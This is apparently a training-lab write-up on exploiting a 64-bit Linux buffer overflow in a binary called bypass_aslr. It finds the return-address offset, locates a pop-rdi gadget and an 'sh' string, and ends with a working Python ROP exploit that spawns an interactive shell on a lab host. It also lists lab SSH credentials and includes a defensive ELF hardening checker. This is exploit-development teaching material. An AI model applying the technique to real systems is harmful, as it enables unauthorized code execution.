
Lab16 Linux x64 ASLR Bypass

The document describes exploiting a 64-bit Linux binary called bypass_aslr that is vulnerable to a buffer overflow. The tasks involve connecting to the target machine, examining the binary to find the overflow and ROP gadgets, and creating an exploit to bypass ASLR and obtain a shell.

Linux x64 ASLR Bypass

LAB 16

© 2019 Caendra Inc. | Hera for XDS | Linux x64 ASLR Bypass 1
SCENARIO
In this lab you will continue to learn x64 Linux exploitation. Both the Operating System
(Ubuntu 16) and the target binary are 64-bit. The Ubuntu system features ASLR. You will
have to find a way around it.

You can connect to the lab machine via SSH. The target IP is 172.16.172.152

In case you need root-level access for debugging, the user below is able to run sudo.

The SSH credentials are the following.

Username: xdev
Password: xdev

GOALS
• Discover vulnerabilities in the binary
• Utilize ROP
• Spawn an interactive bash shell

WHAT YOU WILL LEARN

• Exploiting 64-bit buffer overflows
• Utilizing ROP during buffer overflows
• Bypassing ASLR

RECOMMENDED TOOLS
• GDB / gdb-peda
• ROPgadget
• Text editor
• Kali Linux

NETWORK CONFIGURATION & CREDENTIALS
• Penetration tester’s Subnet: 172.16.172.0/24

• Vulnerable machine: 172.16.172.152

• Connection Type: SSH

ssh xdev@172.16.172.152
password: xdev

TASKS
TASK 1: CONNECT TO THE COMPROMISED MACHINE
AND EXAMINE THE TARGET BINARY
The target binary is named bypass_aslr and is available in the xdev user’s Desktop directory.
As your first task, try to identify vulnerabilities within the binary.

Remember that:

1. The target Ubuntu system has ASLR enabled
2. The binary features no protections

TASK 2: FURTHER EXAMINE THE BINARY AND IDENTIFY
A STRATEGY TO BYPASS ASLR
As you have figured out in Task 1, we can overwrite the return address. We can try returning
to interesting functions but to do so, we need predictability.

Try to find a ROP gadget within the binary itself. We will return to that gadget first, so
that the argument’s address is popped into the appropriate register; then the function will
be called.

Hints:

1. Leverage the system() function that the binary features
2. On x64, system()’s argument is passed in the rdi register
3. Try searching for occurrences of “sh” within the binary

TASK 3: CREATE A POC EXPLOIT AND LAUNCH IT

It is time to combine all the above into a working exploit. Serve bypass_aslr with socat on
the remote machine and then launch the exploit from your attacker’s machine to see if it
works.

SOLUTIONS

Below, you can find solutions for each task. Remember though that you can follow your
own strategy (which may be different from the one explained in the following lab).

TASK 1: CONNECT TO THE COMPROMISED MACHINE
AND EXAMINE THE TARGET BINARY
Let’s start by interacting with the binary. We see that it asks for user input once and then
exits.

Let’s see how this program copes with overly large inputs. gdb-peda’s pattern create
command will be used to generate an overly long, non-repeating (cyclic) input.

Let’s execute ulimit -c unlimited first, so that a core file is written when the process
crashes, and then provide the binary with the above input.

It looks like we managed to crash the target binary. Let’s utilize the dumped core file to
identify if we were able to overwrite the return address.

Like in the Linux x64 Basic Stack Overflow lab, we receive no conclusive information about
the rip register (on x64 a non-canonical return address such as 0x4141414141414141 is never
loaded into rip; the fault is raised by the ret instruction itself). Let’s see the state of the
other registers. Maybe we will have to utilize rbp, as we did in that lab.

Indeed, rbp seems to contain a portion of our sent buffer/payload. Let’s use it to calculate
the offset.

The offset to overwrite rip is 120 (112 + 8).

TASK 2: FURTHER EXAMINE THE BINARY AND IDENTIFY
A STRATEGY TO BYPASS ASLR
Let’s now focus on the functions the target binary includes.

The system function is particularly interesting.

Let’s note its address down.

In order for system to be exploitable, we need to pass it an “sh” argument.

Let’s check for “sh” occurrences within the binary, as follows.

(The breakpoint b *main+8 was chosen arbitrarily; we only need the process stopped inside
the binary so that its memory can be searched.)

Luckily, there are “sh” occurrences within the binary. Because the binary is not
position-independent, these addresses stay the same across runs even though ASLR is
enabled, which gives us the predictability we need.
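The reason those in-binary addresses survive ASLR is that bypass_aslr is a fixed-address (non-PIE) executable. The following added example, written for this write-up and not part of the lab material, parses the ELF64 file header and program headers to report whether a binary is PIE, has a non-executable stack, and has RELRO; the two sample images and the function names (check_elf64, build_sample) are constructed here for illustration.

```python
import struct

ELF_HDR = "<16sHHIQQQIHHHHHH"   # ELF64 file header, little-endian (64 bytes)
PHDR = "<IIQQQQQQ"              # ELF64 program header (56 bytes)
ET_EXEC, ET_DYN = 2, 3
PT_GNU_STACK, PT_GNU_RELRO = 0x6474E551, 0x6474E552
PF_X = 1


def check_elf64(data: bytes) -> dict:
    """Report PIE / NX / RELRO status of a 64-bit little-endian ELF image.

    An ET_EXEC (non-PIE) binary is mapped at its link-time address even with
    kernel ASLR on, so its gadgets, PLT stubs and strings never move.
    """
    if data[:4] != b"\x7fELF" or data[4] != 2 or data[5] != 1:
        raise ValueError("not a 64-bit little-endian ELF")
    (_, e_type, _, _, _, e_phoff, _, _, _, e_phentsize, e_phnum,
     _, _, _) = struct.unpack_from(ELF_HDR, data, 0)
    nx, relro = False, False  # no PT_GNU_STACK header means an executable stack on Linux
    for i in range(e_phnum):
        p_type, p_flags = struct.unpack_from(PHDR, data, e_phoff + i * e_phentsize)[:2]
        if p_type == PT_GNU_STACK:
            nx = not (p_flags & PF_X)
        elif p_type == PT_GNU_RELRO:
            relro = True
    return {"pie": e_type == ET_DYN, "nx": nx, "relro": relro}


def build_sample(e_type: int, stack_flags: int, relro: bool) -> bytes:
    """Construct a minimal ELF64 image holding only the headers inspected above."""
    phdrs = [struct.pack(PHDR, PT_GNU_STACK, stack_flags, 0, 0, 0, 0, 0, 16)]
    if relro:
        phdrs.append(struct.pack(PHDR, PT_GNU_RELRO, 4, 0, 0, 0, 0, 0, 1))
    ident = b"\x7fELF" + bytes([2, 1, 1, 0]) + b"\x00" * 8   # ELFCLASS64, LSB, v1
    hdr = struct.pack(ELF_HDR, ident, e_type, 62, 1, 0x400000, 64, 0, 0,
                      64, 56, len(phdrs), 64, 0, 0)          # e_machine 62 = x86-64
    return hdr + b"".join(phdrs)


# Constructed stand-ins, not the lab binary: UNPROTECTED mirrors what the lab
# describes (ET_EXEC, RWX stack, no RELRO); HARDENED is a PIE with NX and RELRO.
UNPROTECTED = build_sample(ET_EXEC, 7, relro=False)
HARDENED = build_sample(ET_DYN, 6, relro=True)

if __name__ == "__main__":
    for name, img in (("unprotected", UNPROTECTED), ("hardened", HARDENED)):
        print(f"{name}: {check_elf64(img)}")
```

To audit a real file, pass the bytes of the binary to check_elf64; a result of pie=False is the condition that makes in-binary ROP addresses stable under ASLR.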

Let’s now write the first “sh”’s address down. We will pass “sh” as an argument to system to
obtain a shell.

Finally, it’s time to search for a ROP gadget within the binary, where we will return first in
order for the argument’s address to be popped into the rdi register. Then, the function will
be called.

This can be done with the help of ROPgadget, as follows.

(Execute cd ~ to find the ROPgadget tool’s directory.)

Let’s also note this address down.

TASK 3: CREATE A POC EXPLOIT AND LAUNCH IT


All the above can be incorporated into a working exploit, as follows.

#!/usr/bin/env python3
# PoC for bypass_aslr: a three-link ROP chain, system("sh"), built only from
# addresses inside the non-PIE binary, so ASLR does not move any of them.
from struct import pack
from telnetlib import Telnet


def p64(x):
    return pack("<Q", x)  # pack a 64-bit address as little endian


HOST, PORT = "172.16.172.152", 5556
OFFSET = 120                 # junk before the saved return address (112 + 8)
pop_rdi = 0x4007f3           # address of a pop rdi ; ret gadget (from ROPgadget)
system_plt = 0x400590        # address of the system@plt entry
sh = 0x40085c                # address of an "sh" string inside the binary

print("[*] Connecting to server !!")
p = Telnet(HOST, PORT)       # connect to the socat-served binary
print("[*] Connected.")

print(p.read_until(b">").decode(errors="replace"))  # consume the prompt

buf = b"A" * OFFSET          # junk up to the saved rip
buf += p64(pop_rdi)          # first return: pop rdi ; ret
buf += p64(sh)               # popped into rdi, becoming system's argument
buf += p64(system_plt)       # the gadget's ret lands in system("sh")

print("[*] Sending payload ..")
p.write(buf + b"\n")         # send payload
print("[*] Got shell. Enter commands.")
p.interact()

To test the exploit above, first serve bypass_aslr using socat.

Then, from inside your attacking machine, launch the exploit. You should see the following.

